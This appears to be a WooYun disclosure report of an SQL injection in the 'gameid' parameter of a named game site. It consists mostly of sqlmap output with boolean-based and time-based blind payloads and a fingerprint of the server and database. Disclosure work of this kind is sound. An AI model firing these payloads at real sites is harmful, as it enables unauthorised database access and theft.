WooYun.org

http://my.caihongtang.com/tuya.php?gameid=6862 存在sql注入 gameid参数
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: gameid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=6862 AND 6676=6676
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
Payload: gameid=6862 AND 8912=(SELECT COUNT(*) FROM sysusers AS sys1,sysuser
s AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sy
susers AS sys7)
---
[11:22:01] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: Microsoft SQL Server 2005
盲注，就不多跑了